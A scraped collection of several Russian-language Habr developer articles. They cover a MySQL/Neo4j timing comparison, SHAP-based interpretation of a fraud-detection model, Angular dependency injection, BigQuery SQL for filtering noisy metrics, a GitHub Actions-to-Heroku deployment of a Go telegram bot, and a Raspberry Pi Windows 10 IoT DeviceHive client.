| id range < | Time for MySQL, ms | Time for Neo4j,ms |
| 10 | 120 | 10767 |
| 100 | 690 | 10706 |
| 1000 | 5879 | 10884 |
| 5000 | 24668 | 12245 |
| 10000 | 52462 | 12280 |
| 30000 | 154534 | 13352 |
| 60000 | 296369 | 14545 |
| 90000 | 489830 | 18058 |

#### Скромные выводы
Смело могу сказать, что графовая база данных нуждается в намного меньшем временем в поиске на больших объемах данных, однако места на жёстком диске она занимает куда больше. Поэтому для небольших систем лучше использовать реляционную БД или искать альтернативу среди других NoSQL баз данных.
Спасибо за внимание. | https://habr.com/ru/post/258179/ | null | ru | null |
# Оценка важности «фичей» для нелинейных моделей
Задачи, которые сегодня решает машинное обучение, зачастую являются комплексными и включают в себя большое количество признаков (фичей). Из-за сложности и многообразия исходных данных применение простых моделей машинного обучения часто не позволяет достигнуть необходимых результатов, поэтому в реальных бизнес-кейсах применяют сложные, нелинейные модели. У таких моделей есть существенный недостаток: из-за их сложности практически невозможно увидеть логику, по которой модель присвоила именно этот класс операции по счету. Особенно большое значение интерпретируемость модели играет, когда результаты ее работы необходимо представить заказчику — он скорее всего захочет узнать, на основе каких критериев принимаются решения для его бизнеса.
В стандартных пакетах для машинного обучения, таких как sklearn, xgboost, lightGBM существуют методы для оценки важности влияния на конечный результат той или иной фичи (параметра). Однако эти метрики важности не дают представление о том, как именно эти признаки влияют на предсказания модели. Например, как время проведенной операции указывает на то, была ли сделка мошеннической? Или как сильно адрес прописки владельца карты смещает предсказание модели? Для ответа на эти вопросы необходимо найти комплексное решение, которое помогло бы повысить интерпретируемость нелинейных моделей. Таким инструментом является библиотека SHAP. В библиотеке SHAP для оценки вклада фичей в итоговое предсказание моделей рассчитываются значения Шэпли. Для оценки важности фичи происходит оценка предсказаний модели, которая была обучена на основе датасета с и без данной фичи.
Рассмотрим работу данной библиотеки на примере определения мошеннических операций. Рассмотрим поля, которые есть в нашей таблице. В таблице содержится 213 столбцов, что довольно много для ручного перебора с помощью метода обучения модели без каждого признака поочередно для выявления важности каждой из фич.
Приведенный ниже код взят с [kaggle](https://www.kaggle.com/cdeotte/xgb-fraud-with-magic-0-9600) и доработан для демонстрации функций рассматриваемого инструмента.
Загрузим наши датасеты:
```
%%time
# LOAD TRAIN
X_train=pd.read_csv('train_transaction.csv',index_col='TransactionID', dtype=dtypes, usecols=cols+['isFraud'])
train_id= pd.read_csv('train_identity.csv',index_col='TransactionID', dtype=dtypes)
X_train = X_train.merge(train_id, how='left', left_index=True, right_index=True)
# LOAD TEST
X_test=pd.read_csv('test_transaction.csv',index_col='TransactionID', dtype=dtypes, usecols=cols)
test_id = pd.read_csv('test_identity.csv',index_col='TransactionID', dtype=dtypes)
fix = {o:n for o, n in zip(test_id.columns, train_id.columns)}
test_id.rename(columns=fix, inplace=True)
X_test = X_test.merge(test_id, how='left', left_index=True, right_index=True)
# TARGET
y_train = X_train['isFraud'].copy()
del train_id, test_id, X_train['isFraud']; x = gc.collect()
# PRINT STATUS
print('Train shape',X_train.shape,'test shape',X_test.shape)
X_train.head()
```
В данном датасете представлена информация о времени транзакции, времени последней транзакции, домены электронных почт продавца и покупателя, временной промежуток между последней и предыдущей транзакцией и другие параметры, смысл некоторых был скрыт из соображений конфиденциальности.
Для решения поставленной задачи, которая заключается в обнаружении подозрительных (мошеннических) банковских транзакций, необходимо провести предобработку данных, так как данные весьма разнородны. Необходимо заменить категориальные переменные, нормализовать числовые значения, заполнить пропуски, а также создать новые признаки для модели.
После обучения модели на обработанных данных была получена следующая картина важности признаков.
Сделаем график важности фичей:
```
if BUILD95:
feature_imp=pd.DataFrame(sorted(zip(clf.feature_importances_,cols)), columns=['Value','Feature'])
plt.figure(figsize=(20, 10))
sns.barplot(x="Value", y="Feature", data=feature_imp.sort_values(by="Value", ascending=False).iloc[:50])
plt.title('XGB95 Most Important Features')
plt.tight_layout()
plt.show()
del clf, h; x=gc.collect()
```
Исходя из этого видно, что большую значимость на определение мошеннических действий влияют дополнительные признаки, которые не имеют детального описания. Возникает вопрос: каким образом влияют эти признаки на работу классификатора? В таком формате информативность таблицы оценки важности признаков очень мала. Мы точно не знаем, что это за признак и мы абсолютно не знаем, как он влияет на конечный результат. Для того, чтобы получить интерпретируемый результат, применим библиотеку SHAP. В результате получим график, который показывает влияние признаков на то, какой вердикт сделает модель: была ли транзакция мошеннической или вы действительно покупаете моющие средства на сумму 20 тыс. рублей или 50 арбузов.
Сделаем график важности признаков для нашей нелинейной функции:
```
import shap
shap.initjs()
shap_test = shap.TreeExplainer(h).shap_values(X_train.loc[idxT,cols])
shap.summary_plot(shap_test, X_train.loc[idxT,cols],
max_display=25, auto_size_plot=True)
```
На графике присутствует информация о том, как сильно каждый параметр влияет на результат предсказания модели. Сам график разделен на 2 части вертикальной чертой. Слева от него находится класс «0», а справа класс «1». Толщина линии на графике напротив параметра показывает нам, как много элементов присутствует в выборке с данным значением конкретного параметра. Чем краснее точки на графике, тем большее значение имеет фича в ней. Исходя из легенды, которую предоставляют нам разработчики, библиотеки и получившегося графика, можно сделать вывод: чем выше была сумма транзакции, тем выше вероятность, что она была мошеннической. Также на предсказание модели сильно влияет адрес владельца карты, а также его домен email.
На основе полученных данных можно облегчать модель, то есть оставлять только параметры, которые оказывают значимое влияние на результаты предсказания нашей модели. Кроме того, появляется возможность оценить важность фичей для отдельных подгрупп данных, например, клиенты из разных регионов, транзакции в разное время суток и т. д. Кроме того, данный инструмент можно применять для анализа отдельных случаев, например, для анализа «выбросов» и экстремальных значений. Также SHAP может помочь в поиске западающих зон при классификации негативных явлений. Данный инструмент в комплексе с другими подходами позволит сделать модели более легкими, качественными, а результаты интерпретируемыми. | https://habr.com/ru/post/540656/ | null | ru | null |
# Что можно положить в механизм Dependency Injection в Angular?
Почти каждый разработчик на Angular может найти в Dependency Injection решение своей проблемы. Это хорошо было видно в комментариях [к моей прошлой статье](https://habr.com/ru/company/tinkoff/blog/507906/). Люди рассматривали различные варианты работы с данными из DI, сравнивали их удобство для той или иной ситуации. Это здорово, потому что такой простой инструмент дает нам столько возможностей.
Но несколько человек отписались мне, что им тяжело понять DI и его возможности в Angular. В интернете не так уж много материалов о том, как использовать DI эффективно, и для многих разработчиков он сводится к работе с глобальными сервисами или передачей глобальных данных из корня приложения в компоненты.
Давайте посмотрим на этот механизм в Angular чуть глубже.

Знаете ли вы свои зависимости?
------------------------------
Иногда нелегко понять, сколько зависимостей имеет ваш код.
Например, взгляните на этот псевдокласс и посчитайте, сколько зависимостей он имеет:
```
import { API_URL } from '../../../env/api-url';
import { Logger } from '../../services/logger';
class PseudoClass {
request() {
fetch(API_URL).then(...);
}
onError(error) {
const logger = new Logger();
logger.log(document.location, error);
}
}
```
**Ответ**
**fetch** — браузерное API, опираемся на глобальную переменную, ожидая, что она объявлена.
**API\_URL** — импортированные данные из другого файла тоже можно считать зависимостью вашего класса (зависимость от расположения файла).
**new Logger()** — также импортированные данные из другого файла и пересоздания множества экземпляров класса, когда нам достаточно лишь одного.
**document** — также браузерное API и завязка на глобальную переменную.
Ну и что же не так?
-------------------
Например, такой класс тяжело протестировать, так как он зависит от импортированных данных из других файлов и конкретных сущностей в них.
Другая ситуация: document и fetch будут без проблем работать в вашем браузере. Но если однажды вам потребуется перенести приложение в Server Side Rendering, то в nodejs окружении необходимых глобальных переменных может не быть.
Так и что же за DI и зачем он нужен?
------------------------------------
Механизм внедрения зависимостей управляет зависимостями внутри приложения. В принципе, для нас, как для Angular-разработчиков, эта система довольно простая. Есть две основные операции: положить что-то в дерево зависимостей или получить что-то из него.
Если хотите рассмотреть DI с более теоретической стороны, почитайте о [принципе инверсии управления](https://ru.wikipedia.org/wiki/%D0%98%D0%BD%D0%B2%D0%B5%D1%80%D1%81%D0%B8%D1%8F_%D1%83%D0%BF%D1%80%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F). Также можете посмотреть интересные видеоматериалы по теме: [серия видео про IoC и DI](https://www.youtube.com/watch?v=ETyltCwtQHs&list=PLvTBThJr861xKTf1x6P49MwN6yoN4v69k) у Ильи Климова на русском или [небольшое видео про IoC](https://www.youtube.com/watch?v=EPv9-cHEmQw) на английском.
Вся магия возникает от порядка, в котором мы поставляем и берем зависимости.
Схема работы областей видимости в DI:

Что мы можем положить в DI?
---------------------------
Первая из операций с DI — что-то положить в него. Собственно, для этого Angular позволяет нам прописывать providers-массив в декораторах наших модулей, компонентов или директив. Давайте посмотрим, из чего этот массив может состоять.
### Providing класса
Обычно это знает каждый разработчик на Angular. Это тот случай, когда вы добавляете в приложение сервис.
Angular создает экземпляр класса, когда вы запрашиваете его в первый раз. А с Angular 6 мы можем и вовсе не прописывать классы в массив providers, а указать самому классу, в какое место в DI ему встать [с providedIn](https://angular.io/guide/dependency-injection#create-an-injectable-service-class):
```
providers: [
{
provide: SomeService,
useClass: SomeService
},
// Angular позволяет сократить эту запись как самый частый кейс:
SomeService
]
```
### Providing значения
Также через DI можно поставлять константные значения. Это может быть как простая строка с URL вашего API, так и сложный Observable с данными.
Providing значения обычно реализуется в связке [с InjectionToken](https://angular.io/api/core/InjectionToken). Этот объект — ключ для DI-механизма. Сначала вы говорите: «Я хочу получить вот эти данные по такому ключу». А позже приходите к DI и спрашиваете: «Есть ли что-то по этому ключу?»
Ну и частый кейс — проброс глобальных данных из корня приложения.
Лучше посмотреть это сразу в действии, поэтому давайте взглянем на stackblitz с примером:
**Развернуть пример**
Итак, в примере мы получили зависимость из DI вместо того, чтобы импортировать ее как константу из другого файла напрямую. И почему нам от этого лучше?
* Мы можем переопределить значение токена на любом уровне дерева DI, никак не меняя компоненты, которые его используют.
* Мы можем мокировать значение токена подходящими данными при тестировании.
* Компонент полностью изолирован и всегда будет работать одинаково, независимо от контекста.
### Providing фабрики
На мой взгляд, это самый мощный инструмент в механизме внедрения зависимостей Angular.
Вы можете создать токен, в котором будет результат комбинации и преобразования значений других токенов.
Вот еще один stackbitz с подробным примером создания фабрики со стримом.
**Развернуть пример**
Можно найти много кейсов, когда providing фабрики экономит время или делает код более читабельным. Иногда мы внедряем зависимости в компоненты только ради того, чтобы совместить их или преобразовать в совершенно иной формат. [В предыдущей статье](https://habr.com/ru/company/tinkoff/blog/507906/) я рассматривал этот вопрос подробнее и показывал альтернативный подход к решению таких ситуаций.
### Providing существующего экземпляра
Не самый частый случай, но этот вариант бывает очень полезным инструментом.
Вы можете положить в токен сущность, которая уже была создана. Хорошо работает [в связке с forwardRef](https://angular.io/api/core/forwardRef).
Посмотрите еще один пример со stackblitz с директивой, которая имплементирует интерфейс и подменяет собой другой токен через useExisting. В этом примере мы хотим переопределить значение токена только в области видимости DI для дочерних компонентов элемента, на котором висит директива. Причем директива может быть любой — главное, что она реализует необходимый интерфейс.
**Развернуть пример**
Хитрости с DI-декораторами
--------------------------
DI-декораторы позволяют сделать запросы к DI более гибкими.
Если вы не знаете все четыре декоратора, советую почитать вот [эту статью на «Медиуме»](https://medium.com/frontend-coach/self-or-optional-host-the-visual-guide-to-angular-di-decorators-73fbbb5c8658). Статья на английском, но там очень классные и понятные визуализации по теме.
Не многие также знают, что DI-декораторы можно использовать в массиве deps, который готовит аргументы для фабрики в providers.
```
providers: [
{
provide: SOME_TOKEN,
/**
* Чтобы фабрика получила декорированное значение, используйте такой
* [new Decorator(), new Decorator(),..., TOKEN]
* синтаксис.
*
* В этом случае вы получите ‘null’, если не будет значения для
* OPTIONAL_TOKEN
*/
deps: [[new Optional(), OPTIONAL_TOKEN]],
useFactory: someTokenFactory
}
]
```
Фабрика токена
--------------
Конструктор InjectionToken принимает два аргумента.
Второй аргумент — объект с конфигурацией токена.
Фабрика токена это функция, которая вызывается в момент, когда кто-то запрашивает этот токен в первый раз. В ней можно посчитать некое стандартное значение для токена или даже обращаться к другим DI-сущностям через функцию inject.
Посмотрите пример реализации функционала стрима нажатия кнопок, но уже на фабрике токена.
**Развернуть пример**
Заключение
----------
DI в Angular удивительная тема: на первый взгляд, в нем не так много различных рычагов и инструментов для изучения, но можно писать и говорить часами о тех возможностях и способах применения, которые они нам дают.
Надеюсь, этой статьей мне удалось дать вам фундамент, на основе которого вы сможете придумать собственные решения для упрощения работы с данными в ваших приложениях и библиотеках. | https://habr.com/ru/post/516622/ | null | ru | null |
# Поиск стат. значимости в BigQuery или удаление шума
Всё началось с использования ML в BigQuery — оказалось это совсем не больно, и очень эффективно.
Мы в GFN.RU используем модель K-Means для поиска аномалий в работе сервиса. Ведь невозможно кожаному мешку смотреть десятки графиков по тысячам игр ежедневно. Пусть электрический болван подсказывает куда нужно глянуть.
В поиске аномалий с таким подходом есть проблема: если метрика является метрикой второго и более высокого порядка, то K-Means может сообщить об аномалии, хотя, аномалии как таковой нет, а есть шум. Пример метрики второго порядка — среднее время пользователя на сайте. Очевидно, она зависит от количества пользователей. Таким образом, перед тем, как скармливать метрики в K-Means, их нужно отфильтровать от шумов.
Если по простому - определить на базе какой минимальной выборки нужно считать AVG чтоб ему верить.
Это можно сделать различными способами, но я, сторонник использования минимума инструментов — раз уж BQ, то BQ, и нужно, чтоб инструмент был по максимуму универсален - поменяли выборку метрики, а всё остальное осталось таким же. BQ полностью подходит для этой задачи.
Итак, 0-гипотеза — метрика изменяется в допустимых пределах (за базу возьмем 5%).
Необходимо найти количество замеров, при которых изменение метрики будет находиться в нужных пределах. При этом, сделать это в виде нескольких тестов, чтоб более точно проверить гипотезу.
Начнем с выборки данных :
```
with data as (select somemetric as metric
from dataset.data
order by RAND())
select * from data;
```
Здесь всё просто и понятно - взяли данные, перемешали их.
Теперь нам необходимо эти данные разбить на тесты (группы). Я для этого использую метод остатка от деления. Берем какое-либо значение, делим на необходимое количество групп. Остаток от деления будет номером группы. В данном случае в качестве исходного значения брем номер строки в отсортированном списке и делим на 1000 групп.
```
with data as (select somemetric as metric
from dataset.data
order by RAND())
select *, mod(rn, 1000) as num
from (select metric, row_number() over () as rn
from (select metric from data where metric is not null)
)
```
На выходе получили :
1. Значение метрики.
2. Номер строки (он нам дальше понадобится).
3. Номер группы (от 1 до 1000) или номер теста.
Теперь нам нужно найти в каждой группе значение среднего для разного количества элементов. Первое, что приходит в голову - конечно - сделать несколько циклов и посчитать. Но, в SQL циклы не приветствуются. Выражение должно векторизоваться, и тут нам на помощь приходит скользящее среднее.
Мы внутри каждой группы считаем скользящее среднее по значениям от начала группы и до её конца. В итоге, скользящее среднее для 10-й строки - это будет среднее внутри группы из 10 элементов, для 20-й строки - для 20 элементов и так далее.
```
with data as (select somemetric as metric from dataset.data
order by rand())
select *,
avg(metric)
over (partition by num order by rn ROWS BETWEEN UNBOUNDED PRECEDING and CURRENT ROW ) as rolling_avg,
ROW_NUMBER() over (partition by num order by rn) as in_row
from (
select *, mod(rn, 1000) as num
from (select metric, row_number() over () as rn
from (select metric from data where metric is not null)
))
```
Следующим этапом мы считаем расхождение скользящего среднего между текущей и предыдущей строчкой. Процент расхождения и есть процент шума.
```
with data as (select somemetric as metric from dataset.data
order by rand())
select *,
ABS(1 -
SAFE_DIVIDE(rolling_avg,
lag(rolling_avg) over (partition by num order by in_row asc))) as avg_div
from (
select *,
avg(metric)
over (partition by num order by rn ROWS BETWEEN UNBOUNDED PRECEDING and CURRENT ROW ) as rolling_avg,
ROW_NUMBER() over (partition by num order by rn) as in_row
from (
select *, mod(rn, 1000) as num
from (select metric, row_number() over () as rn
from data
))
)
```
Итак, в avg\_div у нас есть процент расхождения среднего между двумя соседними показателями.
Осталось его округлить, обрезать и найти в какой обычно строке из 1000 тестов у нас появляется допустимое расхождение.
```
with data as (select somemetric as metric from dataset.data
order by rand())
select distinct round_div, round(avg(in_row) over ( partition by round_div)) as average_row
from (
select cast(round(avg_div * 100) as int64) as round_div, *
from (select *
from (
select *,
ABS(1 -
SAFE_DIVIDE(rolling_avg,
lag(rolling_avg) over (partition by num order by in_row asc))) as avg_div
from (
select *,
avg(metric)
over (partition by num order by rn ROWS BETWEEN UNBOUNDED PRECEDING and CURRENT ROW ) as rolling_avg,
ROW_NUMBER() over (partition by num order by rn) as in_row
from (
select *, mod(rn, 1000) as num
from (select metric, row_number() over () as rn
from data
))
))
where avg_div is not null
order by avg_div desc))
where round_div<5 order by round_div desc limit 1
```
Собственно и всё : округлили процент расхождений, нашли среднюю строчку в которой достигается нужное расхождение.
Все метрики второго порядка, которые основаны на данных с меньшим количеством - просто отбрасываем - т.к. они с высокой долей вероятности будут обусловлены шумом.
Само собой метрики первого порядка нужно анализировать отдельно - совсем не значит, что если у нас по какой-то группе замер из 2 единиц, то это не аномалия - точнее среднее - конечно же шум и не аномалия, но то, что сегодня 2 единицы данных - вполне может быть аномалией, если обычно ежедневно по 200 единиц.
На закуску: готовая к использованию сторка: <https://github.com/GFNRussia/bqmlalerts/blob/main/stat_sig.sql> | https://habr.com/ru/post/588859/ | null | ru | null |
# Опыт применения GitHub Actions для создания CI/CD с бесплатным хостингом на Heroku
В рамках изучения ЯП Golang я решил сделать учебный проект на примере telegram-бота. Для этой цели я взял популярный для создания ботов [AP](https://go-telegram-bot-api.dev).
Написав реализацию нужной мне бизнес-логики, у меня возник вопрос: А как же мне его по-быстрому собрать и бесплатно развернуть?
Несколько лет назад у меня был опыт создания утилиты на Go, предназначенной для работы в качестве вспомогательного docker контейнера в AWS [ECS](https://aws.amazon.com/ru/ecs/'). И тогда мне понравилась идея, собрать докер из scratch образа без каких-либо базовых образов. Но использовать сервисы AWS для своего pet-проекта я не стал из-за дополнительных хлопот с настройками доступа и ключами безопасности. Я решил попробовать появившуюся не так давно CI/CD автоматизацию [github actions](https://github.com/actions)
Немного изучив предоставляемые CD автоматизации с хостингом, наиболее немногословным мне показалась автоматизация развертывания на [heroku](https://github.com/marketplace/actions/deploy-to-heroku). И хотя опыта с ним я раньше не имел, мне хватило пары минут, чтобы зарегистрировать аккаунт на [HEROKU](https://dashboard.heroku.com/) и найти нужный для работы экшена heroku\_api\_key
Получился достаточно немногословный конфигурационный файл для pipeline, бОльшая часть которого автоматически генерируется из шаблона в GitHub Actions
go.yml
```
name: Go
on:
push:
branches: [ master ]
pull_request:
branches: [ master ]
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Set up Go
uses: actions/setup-go@v2
with:
go-version: 1.16
- name: Build
run: CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o telegramCommandBot -ldflags '-w -s' ./...
- name: Test
run: go test -v ./...
- name: Deploy
uses: akhileshns/heroku-deploy@v3.12.12
with:
heroku_api_key: ${{secrets.HEROKU_API_KEY}}
heroku_app_name: "telegram-command-bot"
heroku_email: ${{secrets.HEROKU_EMAIL}}
usedocker: true
docker_heroku_process_type: "worker"
env:
HD_TELEGRAM_APITOKEN: ${{secrets.TELEGRAM_APITOKEN}}
```
Значения переменных окружения ${{secrets.}} добавляются [настройках](https://docs.github.com/en/actions/reference/encrypted-secrets) репозитория
Единственная не очевидная вещь, которая вызвала у меня недоумение и потребовала дополнительного времени для изучения [документации](https://github.com/marketplace/actions/deploy-to-heroku#environment-variables) - это префикс "HD\_". Его требуется дописывать к декларируемым переменным окружения, чтобы heroku передавал их в окружение контейнера при запуске
Heroku позволяет деплоить docker контейнеры, для этого достаточно указать в heroku-deploy опцию:
```
usedocker: true
```
Ну и положить в корневую папку GitHub репозитория
Dockerfile
```
FROM scratch
COPY telegramCommandBot /telegramCommandBot
ADD ca-certificates.crt /etc/ssl/certs/
ENTRYPOINT ["/telegramCommandBot"]
```
Для внимательных читателей, DockerfileФайл со списком сертификатов ca-certificates.crt требуется для работы HTTPS вызовов, осуществляемых из приложения telegram бота. Я положил его в проект, так как докер собирается без использования базового образа и фактически не содержит ничего, кроме исполняемого telegramCommandBot в [файловом пространстве имен](https://ru.wikipedia.org/wiki/%D0%9F%D1%80%D0%BE%D1%81%D1%82%D1%80%D0%B0%D0%BD%D1%81%D1%82%D0%B2%D0%BE_%D0%B8%D0%BC%D1%91%D0%BD_(Linux)#%D0%A4%D0%B0%D0%B9%D0%BB%D0%BE%D0%B2%D0%B0%D1%8F_%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0_(Mount))
Несколько лет назад, я использовал базовый образ centurylink/ca-certs, но в этот раз меня смутило, что он уже не обновлялся 6 лет.
Буду благодарен читателям, если мне предложат альтернативное решение с добавлением сертификатов, не усложняя при этом Dockerfile
Заключение
----------
GitHub Actions + Heroku предоставляют простые в настройке бесплатные и удобные инструменты для создания CI/CD вашего pet-проекта.
Исходный код проекта можно посмотреть [тут](https://github.com/ebirukov/telegramCommandBot). | https://habr.com/ru/post/571374/ | null | ru | null |
# Не IoT, а малина! Строим IoT-проект на Raspberry Pi с Windows 10 и DeviceHive
Привет, Хабр.
Наверное каждый разработчик на определенном этапе задумывался о собственном IoT-проекте. Internet of Things сейчас поистине вездесущ и многим из нас хочется попробовать свои силы. Но не все знают, с чего начать и за что браться в первую очередь. Сегодня давайте посмотрим, как легко и непринужденно запустить свой собственный IoT-проект под Raspberry Pi 2, используя Windows 10 IoT Core и DeviceHive.
Деплоим Windows 10 приложения на Raspberry Pi 2
-----------------------------------------------
Для начала давайте установим **Windows 10 IoT Core** на Raspberry Pi. Для этого нам потребуется **Windows 10 IoT Core Dashboard**, который можно взять [вот здесь](http://ms-iot.github.io/content/en-US/Downloads.htm). Там же можно при желании скачать отдельно ISO-образ, но особого смысла в этом нет — инструмент сделает это за вас.
Затем мы загружаем образ на misroSD-флешку.

Подключаем флешку к Raspberry и включаем. Первую загрузку ОС придется подождать, мгновенной она, конечно, не будет. Когда устройство «оживет» — подключаем Raspberry к локальной сети по Ethernet. Снова открываем **Windows 10 IoT Core Dashboard** и видим в списке «Мои устройства» заветную строчку. К слову, можно обойтись и без проводного подключения – список WiFi-донглов, поддерживаемых Windows 10 IoT Core, находится [тут](http://ms-iot.github.io/content/en-US/win10/SupportedInterfaces.htm).
Далее нам понадобится Visual Studio 2015. Если она у вас все еще не установлена (хотя вы бы вряд ли читали эту статью в таком случае), можно [скачать](https://www.visualstudio.com/ru-ru/downloads/download-visual-studio-vs.aspx) Community Edition.
Создаем новый или же открываем существующий **Windows Universal** проект. Кстати, если в проекте не нужен UI, можно создать Headless Application, выбрав тип проекта **Windows IoT Core Background Application**.

Выбираем деплой на Remote Machine.

Вводим адрес Raspberry. Посмотреть его можно на стартовом экране **Win10 IoT Core** или в **Windows 10 IoT Core Dashboard**.

Собственно, Internet of Things
------------------------------
Раз уж у нас статья о embedded — «моргать светодиодами» придется в любом случае. Хорошо, что мы имеем дело с DeviceHive, у которого заготовлены инструменты на все случаи жизни и все платформы. Поэтому светодиод будет виртуальный и тоже на .NET.
Клонируем master-ветку [DeviceHive.NET репозитория](https://github.com/devicehive/devicehive-.net/tree/master) с GitHub. На момент написания статьи рабочие примеры для Win10 IoT были именно там.
Открываем solution **DeviceHive.Device** и в файле **Program.cs** проекта **VirtualLed** настраиваем доступ к песочнице DeviceHive.
```
using (var service = new RestfulDeviceService("http://playground.devicehive.com/api/rest"))
{
// create a DeviceHive network where our device will reside
var network = new Network("Network WPNBEP", "Playground Network", "%NETWORK_KEY%");
//...
}
```
Если вы интересуетесь IoT, но по какой-то немыслимой причине еще не обзавелись **DeviceHive Playground** – это можно сделать [здесь](http://playground.devicehive.com/).

А управлять нашим «светодиодом» будет… Нет, пока не Raspberry, а клиент виртуального светодиода. Пример находится в проекте **VirtualLedClient** солюшена **DeviceHive.Client**. Его тоже нужно настроить в файле **Program.cs**:
```
var connectionInfo = new DeviceHiveConnectionInfo("http://playground.devicehive.com/api/rest", "%ACCESS_KEY%");
```
Самое интересное
----------------
Наше приложение на Raspberry Pi будет не просто кнопочкой включения/выключения светодиода, а практически полноценной админкой всех IoT-устройств нашей DeviceHive-сети. При желании, конечно, можно упростить его до той самой «кнопочки» или наоборот расширить, например, до [клиента](http://cs629422.vk.me/v629422762/34b1a/HQQUyXxiQoM.jpg), управляющего [роботом телеприсутствия](http://cs629422.vk.me/v629422762/34b22/REe484OhsUs.jpg).
Готовое приложение находится в том же репозитории, в solution **DeviceHive.WindowsManager.Universal**. Не будем останавливаться на нюансах гайдлайнов Win10 – корни приложения растут еще из Win8. Не будет тут и MVVM – все и так знают, как его применять. Давайте сосредоточимся на главном: нам нужна консоль мониторинга и управления устройствами, подключенными к **DeviceHive**, под **Windows 10** на **Raspberry Pi2**.

Для DeviceHive реализовано три клиентских библиотеки:
* DeviceHive.Client – для «большого» .NET 4.5 и выше. Использует WebSocket4Net.
* DeviceHive.Client.Portable – для Windows 8.1 и Windows Phone 8.1. Использует нативные WebSockets.
* DeviceHive.Client.Universal – для всех редакций Windows 10, в том числе для Win10 IoT Core. Именно она используется в нашем приложении.
Наследуем *ClientService* от *DeviceHiveClient* и инициализируем его сеттингами:
```
DeviceHiveConnectionInfo connInfo;
if (!String.IsNullOrEmpty(Settings.Instance.CloudAccessKey))
{
connInfo = new DeviceHiveConnectionInfo(Settings.Instance.CloudServerUrl, Settings.Instance.CloudAccessKey);
}
else
{
connInfo = new DeviceHiveConnectionInfo(Settings.Instance.CloudServerUrl, Settings.Instance.CloudUsername, Settings.Instance.CloudPassword);
}
current = new ClientService(connInfo, new RestClient(connInfo));
```
А также указываем не использовать *LongPolling*, а только *WebSocket*, дабы не упираться в лимит одновременных HTTP-запросов:
```
SetAvailableChannels(new Channel[] {
new WebSocketChannel(connectionInfo, restClient)
});
```

Загружаем список девайсов и группируем их по сетям в *MainPage*:
```
var deviceList = await ClientService.Current.GetDevicesAsync();
var networkList = (await ClientService.Current.GetNetworksAsync()).FindAll(n => n.Id != null);
foreach (Network network in networkList)
{
var devices = deviceList.FindAll(d => d.Network?.Id == network.Id);
if (devices.Count > 0)
{
networkWithDevicesList.Add(new NetworkViewModel(network) { Devices = devices });
}
}
```
А вот и наш виртуальный светодиод:

Переходим на *DevicePage*, подгружаем информацию о нем:
```
Device = await ClientService.Current.GetDeviceAsync(deviceId);
```

Переключаемся на вкладку с уведомлениями. Уведомления отправляются от управляемого устройства к управляющему устройству. В нашем случае – от **VirtualLedClient** к **VirtualLed**.
Инициализируем автоподгружающийся список с «бесконечным» скроллом:
```
NotificationFilter filter = new NotificationFilter()
{
End = filterNotificationsEnd,
Start = filterNotificationsStart,
SortOrder = SortOrder.DESC
};
var list = new IncrementalLoadingCollection(async (take, skip) =>
{
filter.Skip = (int)skip;
filter.Take = (int)take;
return await ClientService.Current.GetNotificationsAsync(deviceId, filter);
}, 20);
```
Если не определена конечная дата фильтрации списка нотификаций, подписываемся на новые уведомления, которые будут приходить через вебсокет:
```
notificationsSubscription = await ClientService.Current.AddNotificationSubscriptionAsync(new[] { deviceId }, null, async (notificationReceived) =>
{
await Dispatcher.RunAsync(CoreDispatcherPriority.Normal, () =>
{
lock (NotificationsObservable)
{
if (!NotificationsObservable.Any(c => c.Id == notificationReceived.Notification.Id))
{
NotificationsObservable.Insert(0, notificationReceived.Notification);
}
}
});
});
```
Если попробовать переключать наш виртуальный светодиод, то уведомления о его новом состоянии тут же отобразятся в списке.

Если поменять настройки фильтрации, то автоподгружающийся список заново инициализируется с новым фильтром.

Теперь пришла очередь вкладки команд. Команды похожи на нотификации, но направлены от управляющего устройства к управляемому, а также могут иметь статус и результат выполнения.
```
CommandFilter filter = new CommandFilter()
{
End = filterCommandsEnd,
Start = filterCommandsStart,
SortOrder = SortOrder.DESC
};
var list = new IncrementalLoadingCollection(async (take, skip) =>
{
filter.Skip = (int)skip;
filter.Take = (int)take;
return await ClientService.Current.GetCommandsAsync(deviceId, filter);
}, 20);
```
Аналогично подписываемся на новые команды:
```
commandsSubscription = await ClientService.Current.AddCommandSubscriptionAsync(new[] { deviceId }, null, async (commandReceived) =>
{
await Dispatcher.RunAsync(CoreDispatcherPriority.Normal, () =>
{
lock (CommandsObservable)
{
if (!CommandsObservable.Any(c => c.Id == commandReceived.Command.Id))
{
CommandsObservable.Insert(0, commandReceived.Command);
}
}
});
});
```

Поскольку мы делаем инструмент не только для мониторинга, но и для управления устройствами в DeviceHive сети, нужно реализовать возможность отправки команд:
```
var parameters = commandParams.Text != "" ? JObject.Parse(commandParams.Text) : null;
var command = new Command(commandName.Text, parameters);
await ClientService.Current.SendCommandAsync(deviceId, command, CommandResultCallback);
```
При отправке команды мы подписались на ее обновление методом CommandResultCallback. Обрабатываем результат выполнения команды:
```
foreach (Command cmd in CommandsObservable)
{
if (command.Id == cmd.Id)
{
// Command class doesn't implement INotifyPropertyChanded to update its result,
// so old command is replaced by command with result:
var index = commandsObservable.IndexOf(cmd);
commandsObservable.RemoveAt(index);
commandsObservable.Insert(index, command);
break;
}
}
```

Чтобы не копировать команды вручную, нужно предусмотреть клонирование команд. Выделяем, клонируем, если нужно – редактируем, отправляем.

Задача выполнена! Как видите, **Raspberry Pi 2** c **Windows 10 IoT Core** и **DeviceHive** – отличное решение для практически любой задачи в контексте Internet of Things. Прикрутите пару кнопок, dashboard и подключите **Raspberry Pi** к телевизору в гостиной – мониторинг и управление умным домом готово. Купили лишних Raspberry? Не вопрос, библиотека DeviceHive.Client умеет работать не только в качестве управляющего клиента, но и в качестве управляемого девайса – реализуем Headless Application, подключаем датчики/реле и [устанавливаем Raspberry Pi по дому](http://cs629423.vk.me/v629423762/328b9/XptewPZEfc8.jpg). Ограничивает вас лишь ваша фантазия.
Заключение
----------
